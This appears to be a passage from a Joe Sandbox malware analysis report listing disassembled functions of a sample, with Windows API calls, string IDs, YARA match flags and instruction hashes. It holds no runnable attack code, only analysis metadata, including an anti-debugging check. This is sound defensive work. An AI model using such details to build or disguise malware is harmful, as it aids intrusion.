                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1529870607-0
                                                                                                                                                                                                                                            • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                            • Instruction ID: ddf4940b38fe77233b829d96e5e93ea08edf75a94bad4dbe5da1f3de282c151b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2171FC72900228AFDB229F64DD85FAEBBBCEF09711F0041A5B509E6151DA70AF85CF20
                                                                                                                                                                                                                                            Function 0043D678 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                            • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                            • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                                                                                                                                                            Function 024CB9D5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA6E
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024CBCF4,?,00000000), ref: 024CBA97
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,024CBCF4,?,00000000), ref: 024CBAAC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction ID: fe700fbc09080462cc1489e1ccd3d969674786d001abbddece9df515dcfa908c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F21773A600105AAD7748F5DD902BA777A6EB44E5CB66806EE989D7310F733DE81C350
                                                                                                                                                                                                                                            Function 0043B76E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                                                                                                                                                            Function 024CBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024CBCB5
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 024CBD10
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 024CBD1F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,024C0A1C,00000040,?,024C0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024CBD67
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,024C0A9C,00000040), ref: 024CBD86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2287132625-0
                                                                                                                                                                                                                                            • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                            • Instruction ID: 0234186ece980b335b2201505978ecfd96848d35706020ce265d594a3b812761
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F15193799002099BEB51DFA9DC42ABF77B9FF14708F24042FE901E7290EB719A41CB61
                                                                                                                                                                                                                                            Function 0043B942 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2287132625-0
                                                                                                                                                                                                                                            • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                            • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                            Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: C$C
                                                                                                                                                                                                                                            • API String ID: 0-238425240
                                                                                                                                                                                                                                            • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                            • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                            Function 024CB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024C0A23,?,?,?,?,024C047A,?,00000004), ref: 024CB353
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 024CB3E3
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 024CB3F1
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024C0A23,00000000,024C0B43), ref: 024CB494
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2444527052-0
                                                                                                                                                                                                                                            • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                            • Instruction ID: 807a92623273bad5a0fc5b797991b55d28319ce553299938bf2ac813a247c003
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E861FB79604206AAD765AF3DDC46BBB73ADEF04718F24402FE905D7280EB74D540CB65
                                                                                                                                                                                                                                            Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2444527052-0
                                                                                                                                                                                                                                            • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                            • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                            Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2834031935-0
                                                                                                                                                                                                                                            • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                            • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                            Function 024BA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0249DAD7), ref: 024BA732
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0249DAD7), ref: 024BA73C
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0249DAD7), ref: 024BA749
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                            • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                            • Instruction ID: bcd2dae695cca78a1cf2393b09307dd5b9720e163ffa21b8a3c6072774895f94
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F831C67490122C9BCB21DF69D9887DDBBB8BF19710F5041EAE40CA7250E7709B858F54
                                                                                                                                                                                                                                            Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                            • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                            • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                            Function 024C00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00E7
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00EE
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 024C0100
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction ID: 94596048c1fa0f4895347fcea5cbe06743c4e0f01de4d51cbf750717c5248447
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36E04639000148EBCF526F99DD08A493B6AEB02B52F20402DF9048B230CB36EA42DE44
                                                                                                                                                                                                                                            Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                            Function 0249092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                            • API String ID: 0-2784972518
                                                                                                                                                                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                            • Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
                                                                                                                                                                                                                                            Function 024C8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                                                            • API String ID: 0-2043925204
                                                                                                                                                                                                                                            • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                            • Instruction ID: f2770f8a9dcd4ba6199dd1f4cf84a48872e5b76d7781d084af10b5db9c307d3d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2841087A500219AECB219FBDDC48EAB77B9EF84714F60466EF905D7280E7319D41CB50
                                                                                                                                                                                                                                            Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
